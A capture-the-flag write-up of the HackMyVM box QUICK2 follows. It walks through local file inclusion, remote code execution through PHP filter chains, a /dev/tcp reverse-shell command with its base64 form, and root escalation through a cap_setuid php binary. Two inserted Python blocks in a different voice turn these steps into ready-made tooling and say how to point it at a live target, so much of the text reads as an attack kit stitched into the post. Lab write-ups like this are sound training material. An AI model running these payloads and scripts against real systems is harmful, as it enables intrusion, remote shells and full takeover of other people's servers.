Hackmyvm QUICK2

Vishal
3 min readMay 1, 2024

Let's try to solve QUICK2 from HackMyVM. I downloaded it and opened it in Oracle VirtualBox.

The machine got the IP address 192.168.0.225.

To enumerate the open ports I used nmap; the output is below.

nmap showing open ports 22 and 80

Visiting the IP in the browser opens the web page below.

Web app opened in browser

It is similar to the Quick 1 machine. Now let's visit the various tabs and check the web app. The URL looks interesting: http://192.168.0.225/index.php?page=home.php. A page parameter that names a .php file is a classic spot for file inclusion.

Let's test for LFI (Local File Inclusion) by trying to read /etc/passwd through the page parameter. It works: the application is vulnerable to LFI.

LFI: contents of /etc/passwd

I tried various methods to convert this LFI into RCE but could not. I then decided to fuzz the web app for files and directories with wfuzz, which found a new page, 'page.php'.

wfuzz:showing file.php

Visiting the page in the browser, its title says it is vulnerable to LFI, so obviously we can read files on the system. I again tried to turn it into RCE using log poisoning and similar tricks, but failed.

Let's use a PHP filter to read source files, for example index.php. With the payload php://filter/convert.base64-encode/resource=index.php the include returns the file base64-encoded in the HTTP response instead of executing it, so we can decode it locally and read the source. (The wrapper name is php://filter, singular, and the filter is convert.base64-encode with a dot; a typo in either just produces an empty include.)

After many tries I came across this article on HackTricks about turning an LFI into RCE with PHP filter chains. It is a very good article if you are interested in the details: the chain abuses convert.iconv transformations to prepend arbitrary base64 characters to the included stream and then convert.base64-decode to turn them into PHP code, so no file on the target ever has to contain our payload.

Cloned the php_filter_chain_generator repository on my Kali machine from here. Let's first try to read phpinfo.

Command used: python3 php_filter_chain_generator.py --chain '<?php phpinfo(); ?>'

It gives a long output (the php://filter chain). Passing that chain as the page parameter in the browser runs the phpinfo() call.

Now let's generate a payload that executes a command taken from a GET parameter:

python3 php_filter_chain_generator.py --chain '<?=`$_GET[mycmd]`?>'

Copied the generated chain into Burp Suite as the page parameter and appended '&mycmd=<command>' to the request.
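The three steps above (read source through php://filter, decode it, then drive the generated chain with a command parameter) are easy to get wrong in the details, so here is a small helper, as an added example that is not the box's code, the generator's code, or the author's. The target URL, the parameter names page and mycmd, and the index.php content inside FAKE_FS are constructed for illustration; fake_include() only stands in for the vulnerable include() so the helpers can be exercised offline.

```python
"""LFI helpers: read PHP source with php://filter, then append a command
to the php_filter_chain_generator.py output. Added example; not the box's
or the generator's own code. Hosts, parameters and file contents are
constructed for illustration."""
import base64
import re
from urllib.parse import parse_qs, quote, urlparse


def filter_read_url(base_url: str, param: str, path: str) -> str:
    """Request that makes include() return `path` base64-encoded.
    The convert.base64-encode filter turns the included file into text,
    so PHP source comes back instead of being executed."""
    wrapper = f"php://filter/convert.base64-encode/resource={path}"
    return f"{base_url}?{param}={quote(wrapper, safe='/:=')}"


def decode_filter_response(body: str) -> bytes:
    """Pull the base64 blob out of the HTML the include landed in.
    The longest run of base64 characters is taken and '=' padding is
    restored, since page templates sometimes trim the end of the blob."""
    runs = re.findall(r"[A-Za-z0-9+/=]{16,}", body)
    if not runs:
        return b""
    blob = max(runs, key=len).rstrip("=")
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob)


def rce_url(base_url: str, param: str, chain: str, cmd: str,
            cmd_param: str = "mycmd") -> str:
    """Append the command to a chain generated for <?=`$_GET[mycmd]`?>.
    The chain rides in the include parameter; the command rides in a
    second parameter that the injected PHP reads with $_GET."""
    return (f"{base_url}?{param}={quote(chain, safe='/:=|.')}"
            f"&{cmd_param}={quote(cmd, safe='')}")


# Constructed stand-in for the vulnerable server (hypothetical content).
FAKE_FS = {
    "index.php": b"<?php\n$page = $_GET['page'];\ninclude($page);\n",
}


def fake_include(page_param: str) -> str:
    """Mimic include($_GET['page']) for the two cases that matter here:
    a php://filter read returns base64 text; a plain include of a .php
    file would execute it on a real server (the stand-in just returns it)."""
    prefix = "php://filter/convert.base64-encode/resource="
    if page_param.startswith(prefix):
        data = FAKE_FS.get(page_param[len(prefix):], b"")
        body = base64.b64encode(data).decode()
    else:
        body = FAKE_FS.get(page_param, b"").decode(errors="replace")
    return f"<html><body>{body}</body></html>"


def read_source_via_fake(base_url: str, param: str, path: str) -> bytes:
    """Full round trip against the stand-in: build URL, 'send' it, decode.
    Against a real target, replace fake_include() with an HTTP GET."""
    url = filter_read_url(base_url, param, path)
    page = parse_qs(urlparse(url).query)[param][0]
    return decode_filter_response(fake_include(page))


if __name__ == "__main__":
    print(read_source_via_fake("http://192.168.0.225/index.php",
                               "page", "index.php").decode())
    print(rce_url("http://192.168.0.225/index.php", "page",
                  "php://filter/convert.base64-decode/resource=php://temp",
                  "ls -la"))
```

The only change needed for a live target is to replace fake_include() with an HTTP request; decode_filter_response() already copes with the base64 being wrapped in the page's HTML.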

ls command output

Let's start an nc listener on port 9001 on the Kali machine (nc -lvnp 9001) and use the RCE to get a reverse shell. I used the payload "sh -i >& /dev/tcp/192.168.0.135/9001 0>&1", base64-encoded as "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4wLjEzNS85MDAxICAwPiYx" so that it survives being passed in the URL. Note that >& and /dev/tcp are bash features, so the decoded command has to be handed to bash (for example echo <base64> | base64 -d | bash) rather than to sh.

Reverse shell

I again used linpeas to enumerate possible privilege escalation vectors.

The capabilities check shows an interesting result.

capabilities for php8.1

As per GTFOBins:

Let's try to get a shell using php8.1. The capability on the binary lets it switch to uid 0 and spawn a shell, which escalates our privileges to root.
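The GTFOBins entry the author follows relies on the php binary carrying cap_setuid; the screenshot is not reproduced here, so that capability is an assumption in the example below. As an added example (not the author's or GTFOBins' code), this script parses getcap -r / output in both formats libcap prints, lists binaries that carry cap_setuid, and builds the GTFOBins php one-liner. The SAMPLE_GETCAP text is constructed and is not the box's real output.

```python
"""Triage getcap output for cap_setuid and build the GTFOBins php
escalation command. Added example; the sample output is constructed and
the cap_setuid capability on php8.1 is assumed, not taken from the box."""
import subprocess

# Constructed sample of `getcap -r / 2>/dev/null` (hypothetical paths).
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/php8.1 cap_setuid=ep
/usr/lib/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
"""


def parse_getcap(output: str) -> dict[str, set[str]]:
    """Map binary path -> set of capability names.
    libcap 2.4x prints `path cap_a,cap_b=ep`; older versions print
    `path = cap_a,cap_b+ep`. Both are handled."""
    caps: dict[str, set[str]] = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        rest = rest.lstrip("= ")
        names = rest.split("=")[0].split("+")[0]
        caps[path] = {c.strip() for c in names.split(",") if c.strip()}
    return caps


def setuid_capable(caps: dict[str, set[str]]) -> list[str]:
    """Binaries that may call setuid(0) regardless of who runs them."""
    return sorted(p for p, c in caps.items() if "cap_setuid" in c)


def php_setuid_payload(php_path: str) -> list[str]:
    """argv for the GTFOBins php capabilities entry: become uid 0 inside
    the interpreter, then hand off to an interactive shell."""
    return [php_path, "-r", "posix_setuid(0); system('/bin/sh');"]


if __name__ == "__main__":
    try:
        live = subprocess.run(["getcap", "-r", "/"], capture_output=True,
                              text=True, check=False).stdout
    except FileNotFoundError:
        live = SAMPLE_GETCAP  # getcap missing: fall back to the sample
    for binary in setuid_capable(parse_getcap(live or SAMPLE_GETCAP)):
        print("cap_setuid on", binary)
        if "php" in binary:
            print("try:", " ".join(php_setuid_payload(binary)))
```

Run it on the target after the reverse shell; if it reports a php binary, executing the printed command gives a root shell, exactly as the GTFOBins entry describes.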

root shell
root flag

This is a really interesting box; I hope you enjoyed it.
